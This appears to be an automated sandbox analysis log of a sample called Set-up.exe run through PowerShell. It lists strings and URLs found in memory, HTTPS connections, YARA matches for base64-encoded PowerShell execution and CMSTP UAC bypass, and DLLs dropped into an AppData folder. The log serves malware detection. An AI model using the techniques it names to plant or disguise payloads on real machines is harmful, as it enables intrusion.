                    Source: Set-up.exe, 00000005.00000002.2038064529.000000006F009000.00000002.00000001.01000000.0000000E.sdmp, Set-up.exe, 00000008.00000002.2170156520.000000006F009000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: http://trolltech.com/xml/features/report-whitespace-only-CharDatahttp://xml.org/sax/features/namespa
                    Source: powershell.exe, 00000000.00000002.1934473378.0000018E526F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: powershell.exe, 00000000.00000002.1934473378.0000018E53FEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.certum.pl/CPS0
                    Source: powershell.exe, 00000000.00000002.1934473378.0000018E53FEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1934473378.0000018E546AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                    Source: Set-up.exe, 00000005.00000002.2015698096.0000000003706000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2099766209.0000000005043000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2118799916.0000000003ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                    Source: Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.google-analytics.com/collect
                    Source: Set-up.exe, 00000005.00000002.2015698096.00000000036B0000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2099766209.0000000004FFA000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2118799916.0000000003A88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.info-zip.org/
                    Source: Set-up.exe, 00000005.00000002.2017343789.000000006BD29000.00000002.00000001.01000000.0000000D.sdmp, Set-up.exe, 00000008.00000002.2154481527.000000006BD29000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: http://www.phreedom.org/md5)
                    Source: Set-up.exe, 00000005.00000002.2017343789.000000006BD29000.00000002.00000001.01000000.0000000D.sdmp, Set-up.exe, 00000008.00000002.2154481527.000000006BD29000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: http://www.phreedom.org/md5)41UTN-USERFirst-Hardware72:03:21:05:c5:0c:08:57:3d:8e:a5:30:4e:fe:e8:b0D
                    Source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.reneelab.biz/
                    Source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.reneelab.biz/redefinir-senha-de-admin-logon-windows.htmlhttp://support.reneelab.com/anony
                    Source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.reneelab.cc/
                    Source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.reneelab.com.cn/
                    Source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.reneelab.com.cn/product-land-286.htmlhttp://support.reneelab.com/anonymous_requests/newst
                    Source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.reneelab.com/
                    Source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.reneelab.com/product-land-188.htmlhttp://support.reneelab.com/anonymous_requests/newstore
                    Source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.reneelab.de/
                    Source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.reneelab.de/product-land-237.htmlhttp://support.reneelab.com/anonymous_requests/newstore/
                    Source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.reneelab.es/
                    Source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.reneelab.es/product-land-280.htmlhttp://support.reneelab.com/anonymous_requests/newstore/
                    Source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.reneelab.fr/
                    Source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.reneelab.it/
                    Source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.reneelab.it/reimpostare-passwordi-di-windows-login.html
                    Source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.reneelab.jp/
                    Source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.reneelab.jp/product-land-286.htmlhttp://support.reneelab.com/anonymous_requests/newstore/
                    Source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.reneelab.kr/
                    Source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.reneelab.net/
                    Source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.reneelab.net//reset-windows-password.htmlhttp://support.reneelab.com/anonymous_requests/n
                    Source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.reneelab.pl/
                    Source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.reneelab.pl/product-land-280.htmlhttp://support.reneelab.com/anonymous_requests/newpurcha
                    Source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.reneelab.ru/
                    Source: Set-up.exe, 00000005.00000002.2015698096.0000000003706000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2099766209.0000000005043000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2118799916.0000000003ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/cps0(
                    Source: Set-up.exe, 00000005.00000002.2015698096.0000000003706000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2099766209.0000000005043000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2118799916.0000000003ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/rpa00
                    Source: Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.trialpay.com/productpage/?c=3016dc6&tid=6rpipbo
                    Source: Set-up.exe, 00000005.00000002.2015698096.0000000003706000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2099766209.0000000005043000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2118799916.0000000003ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0
                    Source: Set-up.exe, 00000005.00000002.2015698096.0000000003706000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2099766209.0000000005043000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2118799916.0000000003ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0/
                    Source: Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
                    Source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.winimage.com/zLibDll1.2.6
                    Source: Set-up.exe, 00000005.00000002.2038064529.000000006F009000.00000002.00000001.01000000.0000000E.sdmp, Set-up.exe, 00000008.00000002.2170156520.000000006F009000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: http://xml.org/sax/features/namespace-prefixes
                    Source: Set-up.exe, 00000005.00000002.2038064529.000000006F009000.00000002.00000001.01000000.0000000E.sdmp, Set-up.exe, 00000008.00000002.2170156520.000000006F009000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: http://xml.org/sax/features/namespaces
                    Source: powershell.exe, 00000000.00000002.1934473378.0000018E524D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                    Source: powershell.exe, 00000000.00000002.1934473378.0000018E526F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                    Source: Set-up.exe, 00000005.00000002.2015698096.0000000003706000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2099766209.0000000005043000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2118799916.0000000003ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
                    Source: Set-up.exe, 00000005.00000002.2015698096.0000000003706000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2099766209.0000000005043000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2118799916.0000000003ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
                    Source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://downloads.reneelab.com.cn/download_api.php
                    Source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://downloads.reneelab.com.cn/passnow/passnow_
                    Source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://downloads.reneelab.com/download_api.php
                    Source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://downloads.reneelab.com/download_api.phphttps://downloads.reneelab.com.cn/download_api.php?ac
                    Source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://downloads.reneelab.com/passnow/passnow_
                    Source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://downloads.reneelab.com/passnow/passnow_cnhttps://downloads.reneelab.com.cn/passnow/passnow_x
                    Source: powershell.exe, 00000000.00000002.1934473378.0000018E526F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000000.00000002.1934473378.0000018E53FEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.certum.pl/CPS0
                    Source: Set-up.exe, 00000005.00000002.2015583139.00000000035E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.c
                    Source: Set-up.exe, 00000005.00000002.2015698096.0000000003706000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2099766209.0000000005043000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2118799916.0000000003ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                    Source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.reneelab.com
                    Source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.reneelab.comwww.reneelab.comhttp://https://0
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                    Source: unknownHTTPS traffic detected: 104.21.2.224:443 -> 192.168.2.4:49736 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.2.224:443 -> 192.168.2.4:49737 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.2.224:443 -> 192.168.2.4:49738 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.2.224:443 -> 192.168.2.4:49739 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.2.224:443 -> 192.168.2.4:49740 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.2.224:443 -> 192.168.2.4:49741 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.2.224:443 -> 192.168.2.4:49743 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.2.224:443 -> 192.168.2.4:49755 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.75.40:443 -> 192.168.2.4:49761 version: TLS 1.2

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: amsi64_1856.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: 13.2.msiexec.exe.513aacd.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 9.2.msiexec.exe.51e06cd.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 10.2.more.com.439da00.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 12.2.Set-up.exe.3a81877.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 6.2.more.com.5049a00.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 8.2.Set-up.exe.3ae5877.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 9.2.msiexec.exe.519aa00.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 12.2.Set-up.exe.3ac7544.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 12.2.Set-up.exe.3ac6944.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 5.2.Set-up.exe.3753544.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 5.2.Set-up.exe.3752944.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 6.2.more.com.508eacd.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 8.2.Set-up.exe.3b2b544.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 6.2.more.com.508f6cd.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 8.2.Set-up.exe.3b2a944.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 9.2.msiexec.exe.51dfacd.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 10.2.more.com.43e2acd.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 10.2.more.com.43e36cd.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 13.2.msiexec.exe.50f5a00.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 13.2.msiexec.exe.513b6cd.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 5.2.Set-up.exe.370d877.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: Process Memory Space: powershell.exe PID: 1856, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Powershell drops PE file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\VWPGdipf\QtXml4.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\VWPGdipf\UpdateClient.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\VWPGdipf\QtCore4.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\VWPGdipf\msvcr100.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\VWPGdipf\QtGui4.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\VWPGdipf\StarBurn.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\VWPGdipf\UpdateCommon.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\VWPGdipf\QtNetwork4.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\VWPGdipf\RcClientBase.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\VWPGdipf\NAudio.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\VWPGdipf\Data\d3dcompiler_47.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\VWPGdipf\Data\Updater.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\VWPGdipf\Resource.ctJump to dropped file
